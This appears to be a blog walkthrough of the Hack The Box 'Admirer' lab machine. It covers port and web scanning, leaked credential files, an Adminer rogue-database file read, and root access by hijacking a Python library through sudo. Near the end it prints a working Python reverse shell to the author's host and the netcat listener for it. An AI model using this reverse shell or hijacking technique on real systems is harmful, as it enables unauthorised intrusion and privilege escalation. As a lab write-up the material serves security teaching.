Hackthebox – Admirer

As with any box, I start with a port scan.

root@kalivm:~/Admirer# nmap -oN fullscan-A -A 10.10.10.187
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 13:47 CEST
Nmap scan report for 10.10.10.187 (10.10.10.187)
Host is up (0.015s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25
|_http-title: Admirer
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/29%OT=21%CT=1%CU=32372%PV=Y%DS=2%DC=T%G=Y%TM=5ED24C9
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=8)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: Host: admirer.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT      ADDRESS
1   13.98 ms 10.10.14.1 (10.10.14.1)
2   14.46 ms 10.10.10.187 (10.10.10.187)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.35 seconds

Not too much open, ftp, ssh and a web server. As the ftp server does not allow for anonymous login, I start with the web server.
admirer mainpage
The web page does not show much, and further inspection of the source does not disclose anything of interest yet either. So I start running some gobuster and nikto scans against the target to see if there is anything interesting.

root@kalivm:~/Admirer# nikto -host 10.10.10.187 -output admirer-nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.187
+ Target Hostname:    10.10.10.187
+ Target Port:        80
+ Start Time:         2020-05-29 14:08:58 (GMT2)
---------------------------------------------------------------------------
---snip---
+ "robots.txt" contains 1 entry which should be manually viewed.
---snip---

robots.txt file
Upon inspection, the robots.txt file shows an admin-dir entry.
Forbidden error on admin dir
When trying to visit the admin-dir location, it returns only an error 403 Forbidden. Time to see if there are some files or directories accessible with gobuster

root@kalivm:~/Admirer# gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x .txt,.php,.html -u http://10.10.10.187/admin-dir/ -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/admin-dir/
[+] Threads:        40
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/05/29 14:12:45 Starting gobuster
===============================================================
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2020/05/29 14:16:32 Finished
===============================================================

Credentials and Contacts? This might be interesting.

root@kalivm:~/Admirer# curl http://10.10.10.187/admin-dir/credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

Usernames and passwords, perhaps that ftpuser works on the ftp server but lets first take a look at the contacts file.

root@kalivm:~/Admirer# curl http://10.10.10.187/admin-dir/contacts.txt
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

This file is filled with more potential usernames, I gathered those too and store them.

root@kalivm:~/Admirer# ncftp -u ftpuser 10.10.10.187
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.187...                                                                                                          
(vsFTPd 3.0.3)
Logging in...                                                                                                                          
Password requested by 10.10.10.187 for user "ftpuser".

    Please specify the password.

Password: *************

Login successful.
Logged in to 10.10.10.187.                                                                                                             
ncftp / > ls
dump.sql      html.tar.gz

After downloading both, the dump.sql only appears to contain the stuff required to display the website, nothing more than that.

root@kalivm:~/Admirer# ls html/
assets  images  index.php  robots.txt  utility-scripts  w4ld0s_s3cr3t_d1r

The html.tar.gz file appears to be a backup of the html directory of the web server however which looks interesting.

root@kalivm:~/Admirer# egrep -ir 'username.=|password.=' html/
html/index.php:                        $username = "waldo";
html/index.php:                        $password = "]F7jLHw:*G>UPrTo}~A"d6b";
html/utility-scripts/db_admin.php:  $username = "waldo";
html/utility-scripts/db_admin.php:  $password = "Wh3r3_1s_w4ld0?";

And yet two more username/password combinations found. However, when trying the credentials on other ports such as SSH, the ftpuser account appears to work a little, but gets disconnected immediately after login.

root@kalivm:~/Admirer# gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x .txt,.php,.html -u http://10.10.10.187/utility-scripts/ -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/utility-scripts/
[+] Threads:        40
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2020/05/29 14:30:37 Starting gobuster
===============================================================
/info.php (Status: 200)
/phptest.php (Status: 200)
/adminer.php (Status: 200)
===============================================================
2020/05/29 14:32:54 Finished
===============================================================

After some additional recon on the utility-script directory, and spending some time on the various tools in that directory, I find an adminer.php page by using gobuster again.
adminer.php page on admirer
Now I was not entirely familiar with it, but some research pointed out that this was just another form of phpmyadmin, but with some interesting functionality, and in the case of this version, a very useful vulnerability.

root@kalivm:~/~# mysql -u root
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 60
Server version: 10.3.22-MariaDB-1 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> create database admirer;
Query OK, 1 row affected (0.001 sec)

MariaDB [(none)]> create user 'waldo'@'%' identified by '';
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]> grant all privileges on admirer.* to 'waldo'@'%';
Query OK, 0 rows affected (0.001 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.001 sec)

So I create a database and set Waldo’s password. By giving him the username ‘waldo’@’%’, I ensure that a login is allowed from anywhere and I give waldo all permissions on the database I created.
enter credentials of my own system
Time to see if I can log in using these credentials on my local database.
could login to my own system
Ok, that worked, now it is time to see if I can really get the local files read into my database. So first I use this interface to create a simple table, and then start playing with some queries.
cannot access etc/passwd
Apparently I am not able to access /etc/passwd, thats a shame but maybe I can read the index.php file and see if the username/password combination has been changed compared to the downloaded html.tar.gz file.
index.php could be read
I can access the file, and it should now be stored in the table, lets check if I can read the data.

MariaDB [admirer]> select * from data;
+----------------------------------------------------------------+
| data                                                           |
+----------------------------------------------------------------+
----snip----
|                         $servername = "localhost"              |;
|                         $username = "waldo";                   |
|                         $password = "&<h5b~yK3F#{PaPB&dA}{H>"; |
|                         $dbname = "admirerdb";                 |
----snip----
+----------------------------------------------------------------+
123 rows in set (0.001 sec)

And there we have yet another username and password combination which I can try.

root@kalivm:~/Admirer# ssh waldo@10.10.10.187
waldo@10.10.10.187's password: 
Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sat May 29 14:23:58 2020 from 10.10.15.4
waldo@admirer:~$ cat user.txt 
a80c73<NOFLAG>c1c085ed6890e9f3b6

And there is the user flag for Admirer

Privilege escalation

After a little browsing around, I found the sudo privileges quite interesting.

waldo@admirer:~$ sudo -l
[sudo] password for waldo:
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh

It is possible to run a shell script while preserving the environment variables. Lets check out that shell script and see what it calls.

waldo@admirer:~$ cat /opt/scripts/admin_tasks.sh 
----snip----
backup_web()                                                                                                                           
{                                                                                                                                      
    if [ "$EUID" -eq 0 ]                                                                                                               
    then                                                                                                                               
        echo "Running backup script in the background, it might take a while..."                                                       
        /opt/scripts/backup.py &                                                                                                       
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}
----snip----

There were various not so interesting things in the script, but what caught my eye was the Backup Web Function. This function calls backup.py, to which I also don’t have write permisions but as it is yet another script, I decide to check it out.

waldo@admirer:~$ cat /opt/scripts/backup.py 
#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

This script does however, import make_archive from shutil and calls it to compress the files. This might provide a possibility for library hijacking.

waldo@admirer:/tmp/sedje$ cat shutil.py 
import os,subprocess,socket

def make_archive(a, b, c):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.30",9000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"],shell=True);

This actually took me way longer than I liked. Had some half-working shells in between but ultimately found out that it worked way better when adding shell=True to the subprocess call. Nevertheless, I got it working and saved it as shutil.py so that it can be used as library hijacking file.

waldo@admirer:/tmp/sedje$ sudo -E PYTHONPATH=/tmp/sedje /opt/scripts/admin_tasks.sh 6
Running backup script in the background, it might take a while...
waldo@admirer:/tmp/sedje$ /var/backups/html gztar /var/www/html/

Running the script, with the pythonpath set to my shutil.py location so that it includes the reverse shell while my listener is running.

root@kalivm:~/Admirer# rlwrap nc -lvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.187 48172
id
uid=0(root) gid=0(root) groups=0(root)

There is my root shell, now all that is left, is to get the flag!

cat /root/root.txt
9016417<NOFLAG>beb4ffb7ef392d448

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.